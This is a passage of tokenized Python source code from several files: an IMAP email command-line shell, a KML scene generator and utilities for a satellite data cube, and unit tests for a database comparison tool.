( self . imap_account , args [ '<STR_LIT>' ] , [ const . FLAG_DELETED ] ) <EOL> if self . delete_conf [ '<STR_LIT>' ] in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> self . imap_account . expunge ( ) <EOL> def do_read ( self , arg ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> args = docopt . docopt ( u'<STR_LIT:\n>' . join ( [ <EOL> u'<STR_LIT>' , <EOL> u'<STR_LIT>' , <EOL> u'<STR_LIT>' , <EOL> u'<STR_LIT>' , <EOL> ] ) , arg ) <EOL> except SystemExit : <EOL> return <EOL> fetched_mail = fetch . read ( self . imap_account , args [ '<STR_LIT>' ] , <EOL> save_directory = args [ '<STR_LIT>' ] ) <EOL> if fetched_mail is None : <EOL> log . error ( "<STR_LIT>" ) <EOL> if args [ '<STR_LIT>' ] is True : <EOL> temp_file = tempfile . NamedTemporaryFile ( delete = False ) <EOL> temp_file . write ( fetch . display ( fetched_mail , <EOL> browser = True ) . encode ( '<STR_LIT:utf-8>' ) ) <EOL> webbrowser . open_new_tab ( temp_file . name ) <EOL> temp_file . close ( ) <EOL> else : <EOL> sys . stdout . write ( fetch . display ( fetched_mail ) ) <EOL> def do_search ( self , arg ) : <EOL> '''<STR_LIT>''' <EOL> usage = '<STR_LIT:\n>' . join ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] ) <EOL> try : <EOL> args = docopt . docopt ( usage , argv = arg ) <EOL> except SystemExit : <EOL> return <EOL> if args . get ( '<STR_LIT>' ) is not None : <EOL> args [ '<STR_LIT>' ] = args [ '<STR_LIT>' ] . split ( '<STR_LIT:U+002C>' ) <EOL> if args [ '<STR_LIT>' ] is not None : <EOL> try : <EOL> date = datetime . datetime . strptime ( args [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> except ValueError : <EOL> date = None <EOL> else : <EOL> date = None <EOL> search_criterion = search . create_search_criterion ( <EOL> address = args [ '<STR_LIT>' ] , <EOL> date = date , <EOL> subject = args [ '<STR_LIT>' ] , <EOL> size = args [ '<STR_LIT>' ] , <EOL> tags = args [ '<STR_LIT>' ] , <EOL> text = args [ '<STR_LIT>' ] , <EOL> ) <EOL> mail_set = search . fetch_uids ( self . imap_account , <EOL> search_criterion = search_criterion ) <EOL> if len ( mail_set ) == <NUM_LIT:0> : <EOL> log . error ( '<STR_LIT>' ) <EOL> return <NUM_LIT:0> <EOL> for mail_info in search . fetch_mails_info ( self . imap_account , <EOL> mail_set = mail_set ) : <EOL> sys . stdout . write ( <EOL> u'<STR_LIT>' . format ( <EOL> mail_info [ '<STR_LIT>' ] , <EOL> mail_info [ '<STR_LIT>' ] , <EOL> mail_info [ '<STR_LIT>' ] ) ) <EOL> def do_status ( self , arg ) : <EOL> '<STR_LIT>' <EOL> directory_statuses = sorted ( imap_cli . status ( self . imap_account ) , <EOL> key = lambda obj : obj [ '<STR_LIT>' ] ) <EOL> for directory_status in directory_statuses : <EOL> sys . stdout . write ( <EOL> u'<STR_LIT>' . format ( <EOL> directory_status [ '<STR_LIT>' ] , <EOL> directory_status [ '<STR_LIT>' ] , <EOL> directory_status [ '<STR_LIT>' ] , <EOL> directory_status [ '<STR_LIT:count>' ] ) ) <EOL> def do_unseen ( self , arg ) : <EOL> '''<STR_LIT>''' <EOL> search_criterion = search . create_search_criterion ( tags = [ '<STR_LIT>' ] ) <EOL> mail_set = search . fetch_uids ( self . imap_account , <EOL> search_criterion = search_criterion ) <EOL> if len ( mail_set ) == <NUM_LIT:0> : <EOL> log . error ( '<STR_LIT>' ) <EOL> else : <EOL> for mail_info in search . fetch_mails_info ( self . imap_account , <EOL> mail_set = mail_set ) : <EOL> sys . stdout . write ( <EOL> u'<STR_LIT>' . format ( <EOL> mail_info [ '<STR_LIT>' ] , <EOL> mail_info [ '<STR_LIT>' ] , <EOL> mail_info [ '<STR_LIT>' ] ) ) <EOL> def emptyline ( self ) : <EOL> pass <EOL> def keep_alive ( imap_account ) : <EOL> time_count = <NUM_LIT:0> <EOL> while keep_alive_bool is True : <EOL> time_count += <NUM_LIT:1> <EOL> if time_count % keep_alive_timer == <NUM_LIT:0> : <EOL> log . debug ( '<STR_LIT>' ) <EOL> imap_account . noop ( ) <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> log . debug ( '<STR_LIT>' ) <EOL> def main ( ) : <EOL> parser = argparse . ArgumentParser ( description = __doc__ ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , action = '<STR_LIT:store_true>' , <EOL> help = '<STR_LIT>' ) <EOL> args = parser . parse_args ( ) <EOL> logging . basicConfig ( <EOL> level = logging . DEBUG if args . verbose else logging . WARNING , <EOL> stream = sys . stdout , <EOL> ) <EOL> connection_config = config . new_context_from_file ( section = '<STR_LIT>' ) <EOL> if connection_config is None : <EOL> return <NUM_LIT:1> <EOL> delete_config = config . new_context_from_file ( section = '<STR_LIT>' ) <EOL> imap_account = imap_cli . connect ( ** connection_config ) <EOL> imap_shell = ImapShell ( imap_account ) <EOL> imap_shell . delete_conf = delete_config <EOL> keep_alive_thread = threading . Thread ( target = keep_alive , <EOL> args = ( imap_account , ) ) <EOL> keep_alive_thread . start ( ) <EOL> imap_shell . cmdloop ( ) <EOL> keep_alive_thread . join ( ) <EOL> return <NUM_LIT:0> <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> sys . exit ( main ( ) ) </s>
<s> '''<STR_LIT>''' <EOL> import xml . dom . minidom <EOL> import argparse <EOL> from datetime import datetime <EOL> import logging , os , re , copy <EOL> from agdc import DataCube <EOL> from EOtools . utils import log_multiline <EOL> logger = logging . getLogger ( '<STR_LIT>' + __name__ ) <EOL> class SceneKMLGenerator ( DataCube ) : <EOL> '''<STR_LIT>''' <EOL> def parse_args ( self ) : <EOL> """<STR_LIT>""" <EOL> logger . debug ( '<STR_LIT>' ) <EOL> _arg_parser = argparse . ArgumentParser ( '<STR_LIT>' ) <EOL> _arg_parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , dest = '<STR_LIT>' , <EOL> default = os . path . join ( self . agdc_root , '<STR_LIT>' ) , <EOL> help = '<STR_LIT>' ) <EOL> _arg_parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , dest = '<STR_LIT>' , <EOL> default = False , action = '<STR_LIT>' , const = True , <EOL> help = '<STR_LIT>' ) <EOL> _arg_parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , dest = '<STR_LIT>' , <EOL> required = False , default = <NUM_LIT:1> , <EOL> help = '<STR_LIT>' ) <EOL> _arg_parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , dest = '<STR_LIT>' , <EOL> required = False , default = None , <EOL> help = '<STR_LIT>' ) <EOL> _arg_parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , dest = '<STR_LIT>' , <EOL> required = False , default = None , <EOL> help = '<STR_LIT>' ) <EOL> _arg_parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , dest = '<STR_LIT>' , <EOL> required = False , default = None , <EOL> help = '<STR_LIT>' ) <EOL> _arg_parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , dest = '<STR_LIT>' , <EOL> required = False , default = <NUM_LIT> , <EOL> help = '<STR_LIT>' ) <EOL> _arg_parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , dest = '<STR_LIT>' , <EOL> required = False , default = None , <EOL> help = '<STR_LIT>' ) <EOL> return _arg_parser . parse_args ( ) <EOL> def getChildNodesByName ( self , node , nodeName ) : <EOL> return [ child_node for child_node in node . childNodes if child_node . nodeName == nodeName ] <EOL> def __init__ ( self , source_datacube = None , default_tile_type_id = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> if source_datacube : <EOL> self . __dict__ = copy ( source_datacube . __dict__ ) <EOL> args = self . parse_args ( ) <EOL> for attribute_name in args . __dict__ . keys ( ) : <EOL> attribute_value = args . __dict__ [ attribute_name ] <EOL> self . __setattr__ ( attribute_name , attribute_value ) <EOL> else : <EOL> DataCube . __init__ ( self ) <EOL> try : <EOL> self . start_date = datetime . strptime ( self . start_date , '<STR_LIT>' ) . date ( ) <EOL> except : <EOL> try : <EOL> self . start_date = datetime . strptime ( self . start_date , '<STR_LIT>' ) . date ( ) <EOL> except : <EOL> try : <EOL> self . start_date = datetime . strptime ( self . start_date , '<STR_LIT>' ) . date ( ) <EOL> except : <EOL> self . start_date = None <EOL> try : <EOL> self . end_date = datetime . strptime ( self . end_date , '<STR_LIT>' ) . date ( ) <EOL> except : <EOL> try : <EOL> self . end_date = datetime . strptime ( self . end_date , '<STR_LIT>' ) . date ( ) <EOL> except : <EOL> try : <EOL> self . end_date = datetime . strptime ( self . end_date , '<STR_LIT>' ) . date ( ) <EOL> except : <EOL> self . end_date = None <EOL> try : <EOL> self . thumbnail_size = int ( self . thumbnail_size ) <EOL> except : <EOL> self . thumbnail_size = <NUM_LIT> <EOL> try : <EOL> self . min_path = int ( self . min_path ) <EOL> except : <EOL> self . min_path = None <EOL> try : <EOL> self . max_path = int ( self . max_path ) <EOL> except : <EOL> self . max_path = None <EOL> try : <EOL> self . min_row = int ( self . min_row ) <EOL> except : <EOL> self . min_row = None <EOL> try : <EOL> self . max_row = int ( self . max_row ) <EOL> except : <EOL> self . max_row = None <EOL> self . style_dict = { <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : <NUM_LIT:1> } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:width>' : <NUM_LIT:2> } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> } <EOL> } <EOL> def generate ( self , kml_filename = None , wrs_shapefile = '<STR_LIT>' ) : <EOL> '''<STR_LIT>''' <EOL> def write_xml_file ( filename , dom_tree , save_backup = False ) : <EOL> """<STR_LIT>""" <EOL> logger . debug ( '<STR_LIT>' , filename ) <EOL> if save_backup and os . path . exists ( filename + '<STR_LIT>' ) : <EOL> os . remove ( filename + '<STR_LIT>' ) <EOL> if os . path . exists ( filename ) : <EOL> if save_backup : <EOL> os . rename ( filename , filename + '<STR_LIT>' ) <EOL> else : <EOL> os . remove ( filename ) <EOL> try : <EOL> outfile = open ( filename , '<STR_LIT:w>' ) <EOL> assert outfile is not None , '<STR_LIT>' + filename + '<STR_LIT>' <EOL> logger . debug ( '<STR_LIT>' , filename ) <EOL> outfile . write ( re . sub ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> re . sub ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> dom_tree . toprettyxml ( encoding = '<STR_LIT:utf-8>' ) <EOL> ) <EOL> ) <EOL> ) <EOL> finally : <EOL> outfile . close ( ) <EOL> def get_wrs_placemark_node ( wrs_document_node , placemark_name ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return [ placemark_node for placemark_node in self . getChildNodesByName ( wrs_document_node , '<STR_LIT>' ) <EOL> if self . getChildNodesByName ( placemark_node , '<STR_LIT:name>' ) [ <NUM_LIT:0> ] . childNodes [ <NUM_LIT:0> ] . nodeValue == placemark_name ] [ <NUM_LIT:0> ] . cloneNode ( True ) <EOL> except : <EOL> return None <EOL> def create_placemark_node ( wrs_document_node , acquisition_info ) : <EOL> """<STR_LIT>""" <EOL> logger . info ( '<STR_LIT>' , acquisition_info [ '<STR_LIT>' ] ) <EOL> wrs_placemark_name = '<STR_LIT>' % ( acquisition_info [ '<STR_LIT:path>' ] , acquisition_info [ '<STR_LIT>' ] ) <EOL> kml_placemark_name = acquisition_info [ '<STR_LIT>' ] <EOL> placemark_node = get_wrs_placemark_node ( wrs_document_node , wrs_placemark_name ) <EOL> self . getChildNodesByName ( placemark_node , '<STR_LIT:name>' ) [ <NUM_LIT:0> ] . childNodes [ <NUM_LIT:0> ] . nodeValue = kml_placemark_name <EOL> kml_time_span_node = kml_dom_tree . createElement ( '<STR_LIT>' ) <EOL> placemark_node . appendChild ( kml_time_span_node ) <EOL> kml_time_begin_node = kml_dom_tree . createElement ( '<STR_LIT>' ) <EOL> kml_time_begin_text_node = kml_dom_tree . createTextNode ( acquisition_info [ '<STR_LIT>' ] . isoformat ( ) ) <EOL> kml_time_begin_node . appendChild ( kml_time_begin_text_node ) <EOL> kml_time_span_node . appendChild ( kml_time_begin_node ) <EOL> kml_time_end_node = kml_dom_tree . createElement ( '<STR_LIT:end>' ) <EOL> kml_time_end_text_node = kml_dom_tree . createTextNode ( acquisition_info [ '<STR_LIT>' ] . isoformat ( ) ) <EOL> kml_time_end_node . appendChild ( kml_time_end_text_node ) <EOL> kml_time_span_node . appendChild ( kml_time_end_node ) <EOL> description_node = self . getChildNodesByName ( placemark_node , '<STR_LIT:description>' ) [ <NUM_LIT:0> ] <EOL> description_node . childNodes [ <NUM_LIT:0> ] . data = '''<STR_LIT>''' % acquisition_info <EOL> return placemark_node <EOL> kml_filename = kml_filename or self . output_file <EOL> assert kml_filename , '<STR_LIT>' <EOL> wrs_dom_tree = xml . dom . minidom . parse ( wrs_shapefile ) <EOL> wrs_document_element = wrs_dom_tree . documentElement <EOL> wrs_document_node = self . getChildNodesByName ( wrs_document_element , '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> kml_dom_tree = xml . dom . minidom . getDOMImplementation ( ) . createDocument ( wrs_document_element . namespaceURI , <EOL> '<STR_LIT>' , <EOL> wrs_dom_tree . doctype ) <EOL> kml_document_element = kml_dom_tree . documentElement <EOL> for attribute_value in wrs_document_element . attributes . items ( ) : <EOL> kml_document_element . setAttribute ( attribute_value [ <NUM_LIT:0> ] , attribute_value [ <NUM_LIT:1> ] ) <EOL> kml_document_node = kml_dom_tree . createElement ( '<STR_LIT>' ) <EOL> kml_document_element . appendChild ( kml_document_node ) <EOL> for wrs_child_node in [ child_node for child_node in wrs_document_node . childNodes <EOL> if child_node . nodeName != '<STR_LIT>' ] : <EOL> kml_child_node = kml_dom_tree . importNode ( wrs_child_node , True ) <EOL> kml_document_node . appendChild ( kml_child_node ) <EOL> doc_name = '<STR_LIT>' <EOL> if self . satellite or self . sensor : <EOL> doc_name += '<STR_LIT>' <EOL> if self . satellite : <EOL> doc_name += '<STR_LIT>' % self . satellite <EOL> if self . sensor : <EOL> doc_name += '<STR_LIT>' % self . sensor <EOL> if self . start_date : <EOL> doc_name += '<STR_LIT>' % self . start_date <EOL> if self . end_date : <EOL> doc_name += '<STR_LIT>' % self . end_date <EOL> logger . debug ( '<STR_LIT>' , doc_name ) <EOL> self . getChildNodesByName ( kml_document_node , '<STR_LIT:name>' ) [ <NUM_LIT:0> ] . childNodes [ <NUM_LIT:0> ] . data = doc_name <EOL> for style_node in self . getChildNodesByName ( kml_document_node , '<STR_LIT>' ) : <EOL> logger . debug ( '<STR_LIT>' ) <EOL> for tag_name in self . style_dict . keys ( ) : <EOL> tag_nodes = self . getChildNodesByName ( style_node , tag_name ) <EOL> if tag_nodes : <EOL> logger . debug ( '<STR_LIT>' , tag_name ) <EOL> tag_node = tag_nodes [ <NUM_LIT:0> ] <EOL> else : <EOL> logger . debug ( '<STR_LIT>' , tag_name ) <EOL> tag_node = kml_dom_tree . createElement ( tag_name ) <EOL> style_node . appendChild ( tag_node ) <EOL> for attribute_name in self . style_dict [ tag_name ] . keys ( ) : <EOL> attribute_nodes = self . getChildNodesByName ( tag_node , attribute_name ) <EOL> if attribute_nodes : <EOL> logger . debug ( '<STR_LIT>' , attribute_name ) <EOL> attribute_node = attribute_nodes [ <NUM_LIT:0> ] <EOL> text_node = attribute_node . childNodes [ <NUM_LIT:0> ] <EOL> text_node . data = str ( self . style_dict [ tag_name ] [ attribute_name ] ) <EOL> else : <EOL> logger . debug ( '<STR_LIT>' , attribute_name ) <EOL> attribute_node = kml_dom_tree . createElement ( attribute_name ) <EOL> tag_node . appendChild ( attribute_node ) <EOL> text_node = kml_dom_tree . createTextNode ( str ( self . style_dict [ tag_name ] [ attribute_name ] ) ) <EOL> attribute_node . appendChild ( text_node ) <EOL> self . db_cursor = self . db_connection . cursor ( ) <EOL> sql = """<STR_LIT>""" <EOL> params = { <EOL> '<STR_LIT>' : self . start_date , <EOL> '<STR_LIT>' : self . end_date , <EOL> '<STR_LIT>' : self . satellite , <EOL> '<STR_LIT>' : self . sensor <EOL> } <EOL> log_multiline ( logger . debug , self . db_cursor . mogrify ( sql , params ) , '<STR_LIT>' , '<STR_LIT:\t>' ) <EOL> self . db_cursor . execute ( sql , params ) <EOL> field_list = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:path>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> for record in self . db_cursor : <EOL> acquisition_info = { } <EOL> for field_index in range ( len ( field_list ) ) : <EOL> acquisition_info [ field_list [ field_index ] ] = record [ field_index ] <EOL> acquisition_info [ '<STR_LIT>' ] = acquisition_info [ '<STR_LIT>' ] . year <EOL> acquisition_info [ '<STR_LIT>' ] = acquisition_info [ '<STR_LIT>' ] . month <EOL> acquisition_info [ '<STR_LIT>' ] = self . thumbnail_size <EOL> acquisition_info [ '<STR_LIT>' ] = re . search ( '<STR_LIT>' , acquisition_info [ '<STR_LIT>' ] ) . group ( <NUM_LIT:0> ) <EOL> log_multiline ( logger . debug , acquisition_info , '<STR_LIT>' , '<STR_LIT:\t>' ) <EOL> placemark_node = create_placemark_node ( wrs_document_node , acquisition_info ) <EOL> kml_document_node . appendChild ( placemark_node ) <EOL> logger . info ( '<STR_LIT>' , kml_filename ) <EOL> write_xml_file ( kml_filename , kml_dom_tree ) <EOL> def main ( ) : <EOL> skg = SceneKMLGenerator ( ) <EOL> assert skg . output_file , '<STR_LIT>' <EOL> skg . generate ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import time <EOL> import datetime <EOL> import logging <EOL> import errno <EOL> import inspect <EOL> LOGGER = logging . getLogger ( __name__ ) <EOL> LOGGER . setLevel ( logging . INFO ) <EOL> def get_datacube_root ( ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> datacube_root = os . environ [ '<STR_LIT>' ] <EOL> except KeyError : <EOL> this_file = inspect . getsourcefile ( get_datacube_root ) <EOL> datacube_root = os . path . dirname ( os . path . abspath ( this_file ) ) <EOL> return datacube_root <EOL> def parse_date_from_string ( date_string ) : <EOL> """<STR_LIT>""" <EOL> format_list = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> date = None <EOL> for date_format in format_list : <EOL> try : <EOL> date = datetime . datetime . strptime ( date_string , date_format ) . date ( ) <EOL> break <EOL> except ValueError : <EOL> pass <EOL> return date <EOL> def get_file_size_mb ( path ) : <EOL> """<STR_LIT>""" <EOL> return os . path . getsize ( path ) / ( <NUM_LIT> * <NUM_LIT> ) <EOL> def create_directory ( dirname ) : <EOL> """<STR_LIT>""" <EOL> old_umask = os . umask ( <NUM_LIT> ) <EOL> try : <EOL> os . makedirs ( dirname ) <EOL> except OSError , e : <EOL> if e . errno != errno . EEXIST or not os . path . isdir ( dirname ) : <EOL> raise DatasetError ( '<STR_LIT>' % dirname ) <EOL> finally : <EOL> os . umask ( old_umask ) <EOL> def synchronize ( sync_time ) : <EOL> """<STR_LIT>""" <EOL> if sync_time is None : <EOL> return <EOL> float_sync_time = float ( sync_time ) <EOL> while time . time ( ) < float_sync_time : <EOL> continue <EOL> class Stopwatch ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> """<STR_LIT>""" <EOL> self . elapsed_time = <NUM_LIT:0.0> <EOL> self . cpu_time = <NUM_LIT:0.0> <EOL> self . start_elapsed_time = None <EOL> self . start_cpu_time = None <EOL> self . running = False <EOL> def start ( self ) : <EOL> """<STR_LIT>""" <EOL> if not self . running : <EOL> self . start_elapsed_time = time . time ( ) <EOL> self . start_cpu_time = time . clock ( ) <EOL> self . running = True <EOL> def stop ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . running : <EOL> self . elapsed_time += ( time . time ( ) - self . start_elapsed_time ) <EOL> self . cpu_time += ( time . clock ( ) - self . start_cpu_time ) <EOL> self . start_elapsed_time = None <EOL> self . start_cpu_time = None <EOL> self . running = False <EOL> def reset ( self ) : <EOL> """<STR_LIT>""" <EOL> self . __init__ ( ) <EOL> def read ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . running : <EOL> curr_time = time . time ( ) <EOL> curr_clock = time . clock ( ) <EOL> self . elapsed_time += ( curr_time - self . start_elapsed_time ) <EOL> self . cpu_time += ( curr_clock - self . start_cpu_time ) <EOL> self . start_elapsed_time = curr_time <EOL> self . start_cpu_time = curr_clock <EOL> return ( self . elapsed_time , self . cpu_time ) <EOL> class DatasetError ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class DatasetSkipError ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import unittest <EOL> import StringIO <EOL> import dbutil <EOL> import dbcompare <EOL> MODULE = '<STR_LIT>' <EOL> class TestReporter ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> TEST_COLUMNS = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> TEST_ROWS = [ <EOL> ( <NUM_LIT:1> , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( <NUM_LIT:2> , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( <NUM_LIT:4> , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( <NUM_LIT:4> , '<STR_LIT>' , '<STR_LIT>' ) <EOL> ] <EOL> SUITE = '<STR_LIT>' <EOL> TEST_TABLE = '<STR_LIT>' <EOL> TEST_COLUMN = '<STR_LIT>' <EOL> def setUp ( self ) : <EOL> self . output = [ None ] * <NUM_LIT:4> <EOL> for i in range ( <NUM_LIT:4> ) : <EOL> self . output [ i ] = StringIO . StringIO ( ) <EOL> self . report = [ None ] * <NUM_LIT:4> <EOL> for i in range ( <NUM_LIT:4> ) : <EOL> self . report [ i ] = dbcompare . Reporter ( '<STR_LIT>' , '<STR_LIT>' , <EOL> i , self . output [ i ] ) <EOL> def check_output ( self , file_name , output_str ) : <EOL> """<STR_LIT>""" <EOL> output_dir_path = dbutil . output_directory ( MODULE , self . SUITE ) <EOL> output_file_path = os . path . join ( output_dir_path , file_name ) <EOL> with open ( output_file_path , '<STR_LIT:w>' ) as output_file : <EOL> output_file . write ( output_str ) <EOL> expected_dir_path = dbutil . expected_directory ( MODULE , self . SUITE ) <EOL> expected_file_path = os . path . join ( expected_dir_path , file_name ) <EOL> if os . path . isfile ( expected_file_path ) : <EOL> with open ( expected_file_path ) as expected_file : <EOL> expected_str = expected_file . read ( ) <EOL> self . assertEqual ( output_str , expected_str ) <EOL> else : <EOL> self . skipTest ( ( "<STR_LIT>" + <EOL> "<STR_LIT>" ) % <EOL> ( file_name , MODULE , self . SUITE ) ) <EOL> def test_table_only_in_v0 ( self ) : <EOL> "<STR_LIT>" <EOL> self . report [ <NUM_LIT:0> ] . table_only_in ( <NUM_LIT:1> , self . TEST_TABLE ) <EOL> self . assertEqual ( self . output [ <NUM_LIT:0> ] . getvalue ( ) , "<STR_LIT>" ) <EOL> def test_table_only_in_v1 ( self ) : <EOL> "<STR_LIT>" <EOL> self . report [ <NUM_LIT:1> ] . table_only_in ( <NUM_LIT:1> , self . TEST_TABLE ) <EOL> self . check_output ( '<STR_LIT>' , <EOL> self . output [ <NUM_LIT:1> ] . getvalue ( ) ) <EOL> def test_table_only_in_v2 ( self ) : <EOL> "<STR_LIT>" <EOL> self . report [ <NUM_LIT:2> ] . table_only_in ( <NUM_LIT:2> , self . TEST_TABLE ) <EOL> self . check_output ( '<STR_LIT>' , <EOL> self . output [ <NUM_LIT:2> ] . getvalue ( ) ) <EOL> def test_column_only_in_v0 ( self ) : <EOL> "<STR_LIT>" <EOL> self . report [ <NUM_LIT:0> ] . column_only_in ( <NUM_LIT:1> , self . TEST_TABLE , self . TEST_COLUMN ) <EOL> self . assertEqual ( self . output [ <NUM_LIT:0> ] . getvalue ( ) , "<STR_LIT>" ) <EOL> def test_column_only_in_v1 ( self ) : <EOL> "<STR_LIT>" <EOL> self . report [ <NUM_LIT:1> ] . column_only_in ( <NUM_LIT:2> , self . TEST_TABLE , self . TEST_COLUMN ) <EOL> self . check_output ( '<STR_LIT>' , <EOL> self . output [ <NUM_LIT:1> ] . getvalue ( ) ) <EOL> def test_column_only_in_v3 ( self ) : <EOL> "<STR_LIT>" <EOL> self . report [ <NUM_LIT:3> ] . column_only_in ( <NUM_LIT:1> , self . TEST_TABLE , self . TEST_COLUMN ) <EOL> self . check_output ( '<STR_LIT>' , <EOL> self . output [ <NUM_LIT:3> ] . getvalue ( ) ) <EOL> def test_primary_keys_differ_v0 ( self ) : <EOL> "<STR_LIT>" <EOL> self . report [ <NUM_LIT:0> ] . primary_keys_differ ( self . TEST_TABLE ) <EOL> self . assertEqual ( self . output [ <NUM_LIT:0> ] . getvalue ( ) , "<STR_LIT>" ) <EOL> def test_primary_keys_differ_v1 ( self ) : <EOL> "<STR_LIT>" <EOL> self . report [ <NUM_LIT:1> ] . primary_keys_differ ( self . TEST_TABLE ) <EOL> self . check_output ( '<STR_LIT>' , <EOL> self . output [ <NUM_LIT:1> ] . getvalue ( ) ) <EOL> def test_content_differences_v3 ( self ) : <EOL> "<STR_LIT>" <EOL> self . report [ <NUM_LIT:3> ] . new_table ( self . TEST_TABLE , self . TEST_COLUMNS ) <EOL> self . report [ <NUM_LIT:3> ] . add_difference ( <NUM_LIT:1> , self . TEST_ROWS [ <NUM_LIT:0> ] ) <EOL> self . report [ <NUM_LIT:3> ] . add_difference ( <NUM_LIT:2> , self . TEST_ROWS [ <NUM_LIT:1> ] ) <EOL> self . report [ <NUM_LIT:3> ] . add_difference ( <NUM_LIT:1> , self . TEST_ROWS [ <NUM_LIT:2> ] ) <EOL> self . report [ <NUM_LIT:3> ] . add_difference ( <NUM_LIT:2> , self . TEST_ROWS [ <NUM_LIT:3> ] ) <EOL> self . report [ <NUM_LIT:3> ] . content_differences ( ) <EOL> self . check_output ( '<STR_LIT>' , <EOL> self . output [ <NUM_LIT:3> ] . getvalue ( ) ) <EOL> class TestComparisonWrapper ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> SAVE_DIR = dbutil . input_directory ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> TEST_DB_FILE = "<STR_LIT>" <EOL> NOT_A_TABLE = "<STR_LIT>" <EOL> EXPECTED_TABLE_LIST = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> COLUMN_LIST_TABLE = "<STR_LIT>" <EOL> EXPECTED_COLUMN_LIST = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> SIMPLE_PKEY_TABLE = "<STR_LIT>" <EOL> EXPECTED_SIMPLE_PKEY = [ '<STR_LIT>' ] <EOL> COMPOUND_PKEY_TABLE = "<STR_LIT>" <EOL> EXPECTED_COMPOUND_PKEY = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> SREF_PKEY_TABLE = "<STR_LIT>" <EOL> EXPECTED_SREF_PKEY = [ '<STR_LIT>' ] <EOL> def setUp ( self ) : <EOL> self . conn = None <EOL> self . dbname = dbutil . random_name ( '<STR_LIT>' ) <EOL> dbutil . TESTSERVER . create ( self . dbname , self . SAVE_DIR , self . TEST_DB_FILE ) <EOL> self . conn = dbutil . TESTSERVER . connect ( self . dbname ) <EOL> self . conn = dbcompare . ComparisonWrapper ( self . conn ) <EOL> def test_table_exists ( self ) : <EOL> "<STR_LIT>" <EOL> self . assertTrue ( self . conn . table_exists ( self . EXPECTED_TABLE_LIST [ <NUM_LIT:0> ] ) , <EOL> "<STR_LIT>" % <EOL> self . EXPECTED_TABLE_LIST [ <NUM_LIT:0> ] ) <EOL> self . assertTrue ( self . conn . table_exists ( self . EXPECTED_TABLE_LIST [ - <NUM_LIT:1> ] ) , <EOL> "<STR_LIT>" % <EOL> self . EXPECTED_TABLE_LIST [ - <NUM_LIT:1> ] ) <EOL> self . assertTrue ( self . conn . table_exists ( self . 